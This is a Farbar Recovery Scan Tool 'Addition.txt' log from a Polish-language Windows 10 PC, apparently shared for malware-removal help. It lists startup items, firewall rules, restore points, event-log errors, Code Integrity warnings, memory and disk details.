C:\Users\Kinia\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\lustig-kaffee-eulen-hintergr-nde-234770.jpg HKU\S-1-5-21-685155951-3447365402-3300008554-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-04262017152626108\Control Panel\Desktop\\Wallpaper -> C:\Users\Kinia\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\lustig-kaffee-eulen-hintergr-nde-234770.jpg DNS Servers: 8.8.8.8 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == HKLM\...\StartupApproved\StartupFolder: => "Network Server.lnk" HKLM\...\StartupApproved\Run32: => "GrooveMonitor" HKLM\...\StartupApproved\Run32: => "AdobeAAMUpdater-1.0" HKLM\...\StartupApproved\Run32: => "Autodesk Desktop App" HKU\S-1-5-21-685155951-3447365402-3300008554-1001\...\StartupApproved\Run: => "OneDrive" HKU\S-1-5-21-685155951-3447365402-3300008554-1001\...\StartupApproved\Run: => "CCleaner Monitoring" HKU\S-1-5-21-685155951-3447365402-3300008554-1001\...\StartupApproved\Run: => "DIMPobieranie aktualizacji...1300677038363" HKU\S-1-5-21-685155951-3447365402-3300008554-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-04262017152626108\...\StartupApproved\Run: => "OneDrive" HKU\S-1-5-21-685155951-3447365402-3300008554-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-04262017152626108\...\StartupApproved\Run: => "CCleaner Monitoring" HKU\S-1-5-21-685155951-3447365402-3300008554-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-04262017152626108\...\StartupApproved\Run: => "DIMPobieranie aktualizacji...1300677038363" ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139 FirewallRules: [{BC8FE20C-131E-423C-BDE4-29E4F9E562E7}] => (Allow) C:\Users\Kinia\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{18864C8D-59B4-48F2-B803-7FDCB5EF8FB1}] => (Allow) C:\Users\Kinia\AppData\Roaming\uTorrent\uTorrent.exe FirewallRules: [{8C53AE0D-7FF5-44A1-B50C-04FF2E530823}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe FirewallRules: [{94513340-1EFA-4C7C-9E39-C1B6831B3A30}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe FirewallRules: [{37CAFBE6-6AC5-484A-98B9-CB189F893034}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe FirewallRules: [{2467A275-1F90-46DD-9F91-16302F75D0F3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe FirewallRules: [{A9138394-B8F6-4FCD-8F54-F69C0F532F91}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{E3081693-8C8B-4BFC-960F-37388051A669}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{2B969835-E5AF-4F4C-A6B6-05F17D1C17E3}] => (Allow) D:\The Sims 2 Ultimate Collection\The Sims 2 Mansion and Garden Stuff\TSBin\Sims2EP9.exe FirewallRules: [{F5B5BF50-0391-4E47-BEDE-265339B39E44}] => (Allow) D:\The Sims 2 Ultimate Collection\The Sims 2 Mansion and Garden Stuff\TSBin\Sims2EP9.exe FirewallRules: [{300C3918-1DD5-47A3-B799-A650196010C7}] => (Allow) D:\The Sims 2 Ultimate Collection\The Sims 2 Mansion and Garden Stuff\CSBin\TS2BodyShop.exe FirewallRules: [{8AB86D57-3926-47A7-B33C-56AA7B905765}] => (Allow) D:\The Sims 2 Ultimate Collection\The Sims 2 Mansion and Garden Stuff\CSBin\TS2BodyShop.exe FirewallRules: [TCP Query User{BF5DFA62-5056-49E0-A431-523B6B1D7202}C:\program files\sketchup\sketchup 2016\sketchup.exe] => (Block) C:\program files\sketchup\sketchup 2016\sketchup.exe FirewallRules: [UDP Query User{60E3769C-1309-41C0-8505-26ECDD13D4D9}C:\program files\sketchup\sketchup 2016\sketchup.exe] => (Block) C:\program files\sketchup\sketchup 2016\sketchup.exe FirewallRules: [TCP Query User{8A1E9D1E-4BBC-4B7E-80BF-2E77F4E65722}C:\programdata\asgvis\common\x64\vc101\distributed rendering\xmldrspawner.exe] => (Block) C:\programdata\asgvis\common\x64\vc101\distributed rendering\xmldrspawner.exe FirewallRules: [UDP Query User{B2EA8784-74EF-4E99-AB42-483C82F46E82}C:\programdata\asgvis\common\x64\vc101\distributed rendering\xmldrspawner.exe] => (Block) C:\programdata\asgvis\common\x64\vc101\distributed rendering\xmldrspawner.exe FirewallRules: [TCP Query User{DA34B249-11DA-437B-9FFE-BF34C963065C}C:\users\kinia\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\kinia\appdata\local\akamai\netsession_win.exe FirewallRules: [UDP Query User{1734F7CF-B51B-47F6-972D-B4C015F3EF35}C:\users\kinia\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\kinia\appdata\local\akamai\netsession_win.exe FirewallRules: [{2574CA70-853D-40CF-A03C-17C1EA13922E}] => (Block) C:\users\kinia\appdata\local\akamai\netsession_win.exe FirewallRules: [{26935A66-45C8-4319-A029-C22240BB409D}] => (Block) C:\users\kinia\appdata\local\akamai\netsession_win.exe FirewallRules: [{0DFD25EB-3106-434D-97E6-B7469F9FE8FB}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ==================== Restore Points ========================= 19-04-2017 22:14:10 Installed SpyHunter 24-04-2017 12:23:32 Zainstalowano: Microsoft Visual C++ 2005 Redistributable 24-04-2017 12:24:53 Zainstalowano: Microsoft Visual C++ 2005 Redistributable (x64) 25-04-2017 14:25:32 Removed AlphaGo ==================== Faulty Device Manager Devices ============= Name: Description: Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. ==================== Event log errors: ========================= Application errors: ================== Error: (04/26/2017 03:44:04 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: mbamservice.exe, wersja: 3.1.0.415, sygnatura czasowa: 0x5881b7a1 Nazwa modułu powodującego błąd: ntdll.dll, wersja: 10.0.14393.479, sygnatura czasowa: 0x5825887f Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x0000000000037930 Identyfikator procesu powodującego błąd: 0xe54 Godzina uruchomienia aplikacji powodującej błąd: 0x01d2be90aae8e0e1 Ścieżka aplikacji powodującej błąd: C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe Ścieżka modułu powodującego błąd: C:\WINDOWS\SYSTEM32\ntdll.dll Identyfikator raportu: e211d6f0-c04a-4331-ab1f-982e77f2e319 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (04/26/2017 01:53:14 PM) (Source: SideBySide) (EventID: 63) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "c:\program files (x86)\wibukey\server\WkSvCtrl.dll". Błąd w pliku manifestu lub w pliku zasad "c:\program files (x86)\wibukey\server\WkSvCtrl.dll" w wierszu 6. Wartość "6.32.1504.(500 + 0)" atrybutu "version" elementu "assemblyIdentity" jest nieprawidłowa. Error: (04/26/2017 01:38:35 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: microsoftedgecp.exe, wersja: 11.0.14393.953, sygnatura czasowa: 0x58ba5911 Nazwa modułu powodującego błąd: unknown, wersja: 0.0.0.0, sygnatura czasowa: 0x00000000 Kod wyjątku: 0xc0000604 Przesunięcie błędu: 0x0000000000000000 Identyfikator procesu powodującego błąd: 0x2224 Godzina uruchomienia aplikacji powodującej błąd: 0x01d2be81a37a3865 Ścieżka aplikacji powodującej błąd: C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\microsoftedgecp.exe Ścieżka modułu powodującego błąd: unknown Identyfikator raportu: 15ade465-20ce-4bcd-87ac-a23c34cfd871 Pełna nazwa pakietu powodującego błąd: Microsoft.MicrosoftEdge_38.14393.1066.0_neutral__8wekyb3d8bbwe Identyfikator aplikacji względem pakietu powodującego błąd: MicrosoftEdge Error: (04/26/2017 01:21:25 PM) (Source: SideBySide) (EventID: 63) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "c:\program files (x86)\wibukey\server\WkSvCtrl.dll". Błąd w pliku manifestu lub w pliku zasad "c:\program files (x86)\wibukey\server\WkSvCtrl.dll" w wierszu 6. Wartość "6.32.1504.(500 + 0)" atrybutu "version" elementu "assemblyIdentity" jest nieprawidłowa. Error: (04/26/2017 01:19:31 PM) (Source: SideBySide) (EventID: 63) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "c:\program files (x86)\wibukey\server\WkSvCtrl.dll". Błąd w pliku manifestu lub w pliku zasad "c:\program files (x86)\wibukey\server\WkSvCtrl.dll" w wierszu 6. Wartość "6.32.1504.(500 + 0)" atrybutu "version" elementu "assemblyIdentity" jest nieprawidłowa. Error: (04/26/2017 01:09:57 PM) (Source: SideBySide) (EventID: 63) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "c:\program files (x86)\wibukey\server\WkSvCtrl.dll". Błąd w pliku manifestu lub w pliku zasad "c:\program files (x86)\wibukey\server\WkSvCtrl.dll" w wierszu 6. Wartość "6.32.1504.(500 + 0)" atrybutu "version" elementu "assemblyIdentity" jest nieprawidłowa. Error: (04/26/2017 12:49:43 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: microsoftedgecp.exe, wersja: 11.0.14393.953, sygnatura czasowa: 0x58ba5911 Nazwa modułu powodującego błąd: unknown, wersja: 0.0.0.0, sygnatura czasowa: 0x00000000 Kod wyjątku: 0xc0000604 Przesunięcie błędu: 0x0000000000000000 Identyfikator procesu powodującego błąd: 0x1ec0 Godzina uruchomienia aplikacji powodującej błąd: 0x01d2be7acf6dad6c Ścieżka aplikacji powodującej błąd: C:\WINDOWS\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\microsoftedgecp.exe Ścieżka modułu powodującego błąd: unknown Identyfikator raportu: 4bf4687c-b63c-4d49-a613-be469a1da086 Pełna nazwa pakietu powodującego błąd: Microsoft.MicrosoftEdge_38.14393.1066.0_neutral__8wekyb3d8bbwe Identyfikator aplikacji względem pakietu powodującego błąd: MicrosoftEdge Error: (04/26/2017 12:49:35 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: chrome.exe, wersja: 58.0.3029.81, sygnatura czasowa: 0x58f6b153 Nazwa modułu powodującego błąd: unknown, wersja: 0.0.0.0, sygnatura czasowa: 0x00000000 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x00007ffa4cf60012 Identyfikator procesu powodującego błąd: 0x41c Godzina uruchomienia aplikacji powodującej błąd: 0x01d2be7acb3b6fbf Ścieżka aplikacji powodującej błąd: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Ścieżka modułu powodującego błąd: unknown Identyfikator raportu: ac5a8e3c-c6ce-457d-a497-fe4d5f6fa9b1 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (04/26/2017 12:41:51 PM) (Source: SideBySide) (EventID: 63) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "c:\program files (x86)\wibukey\server\WkSvCtrl.dll". Błąd w pliku manifestu lub w pliku zasad "c:\program files (x86)\wibukey\server\WkSvCtrl.dll" w wierszu 6. Wartość "6.32.1504.(500 + 0)" atrybutu "version" elementu "assemblyIdentity" jest nieprawidłowa. Error: (04/26/2017 12:20:45 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: Wacom_Tablet.exe, wersja: 6.3.21.3, sygnatura czasowa: 0x58c071f8 Nazwa modułu powodującego błąd: Wacom_Tablet.exe, wersja: 6.3.21.3, sygnatura czasowa: 0x58c071f8 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x00000000002a33e0 Identyfikator procesu powodującego błąd: 0x1b94 Godzina uruchomienia aplikacji powodującej błąd: 0x01d2be122ce0d382 Ścieżka aplikacji powodującej błąd: C:\Program Files\Tablet\Wacom\Wacom_Tablet.exe Ścieżka modułu powodującego błąd: C:\Program Files\Tablet\Wacom\Wacom_Tablet.exe Identyfikator raportu: f3c89ba3-63ee-4576-8dac-e149a93e7544 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: System errors: ============= Error: (04/26/2017 04:03:39 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Energy Server Service queencreek zakończyła działanie; wystąpił następujący błąd: Ten strumień nie jest mały. Error: (04/26/2017 04:03:09 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Energy Server Service queencreek zakończyła działanie; wystąpił następujący błąd: Ten strumień nie jest mały. Error: (04/26/2017 03:59:55 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Energy Server Service queencreek zakończyła działanie; wystąpił następujący błąd: Ten strumień nie jest mały. Error: (04/26/2017 03:59:25 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Energy Server Service queencreek zakończyła działanie; wystąpił następujący błąd: Ten strumień nie jest mały. Error: (04/26/2017 03:56:11 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Energy Server Service queencreek zakończyła działanie; wystąpił następujący błąd: Ten strumień nie jest mały. Error: (04/26/2017 03:55:41 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Energy Server Service queencreek zakończyła działanie; wystąpił następujący błąd: Ten strumień nie jest mały. Error: (04/26/2017 03:52:27 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Energy Server Service queencreek zakończyła działanie; wystąpił następujący błąd: Ten strumień nie jest mały. Error: (04/26/2017 03:51:57 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Energy Server Service queencreek zakończyła działanie; wystąpił następujący błąd: Ten strumień nie jest mały. Error: (04/26/2017 03:48:43 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Energy Server Service queencreek zakończyła działanie; wystąpił następujący błąd: Ten strumień nie jest mały. Error: (04/26/2017 03:48:13 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Energy Server Service queencreek zakończyła działanie; wystąpił następujący błąd: Ten strumień nie jest mały. CodeIntegrity: =================================== Date: 2017-04-26 13:50:58.388 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Store signing level requirements. Date: 2017-04-26 13:50:58.388 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Store signing level requirements. Date: 2017-04-25 12:02:29.649 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements. Date: 2017-04-25 11:51:43.088 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements. Date: 2017-04-25 11:37:33.068 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\DriverStore\FileRepository\nvlti.inf_amd64_10adcfc1f8eba874\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-04-25 11:37:32.557 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-04-23 14:45:22.973 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\DriverStore\FileRepository\nvlti.inf_amd64_10adcfc1f8eba874\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-04-23 14:45:22.350 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-04-20 15:05:23.804 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Windows\System32\DriverStore\FileRepository\nvlti.inf_amd64_10adcfc1f8eba874\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-04-20 15:05:23.125 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements. ==================== Memory info =========================== Processor: Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz Percentage of memory in use: 57% Total physical RAM: 7986.86 MB Available physical RAM: 3412.23 MB Total Virtual: 9906.86 MB Available Virtual: 5243.92 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:442.25 GB) (Free:360.14 GB) NTFS Drive d: () (Fixed) (Total:487.83 GB) (Free:473.89 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: D9FA2484) Partition 1: (Active) - (Size=1000 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=442.3 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=487.8 GB) - (Type=07 NTFS) Partition 4: (Not Active) - (Size=463 MB) - (Type=27) ==================== End of Addition.txt ============================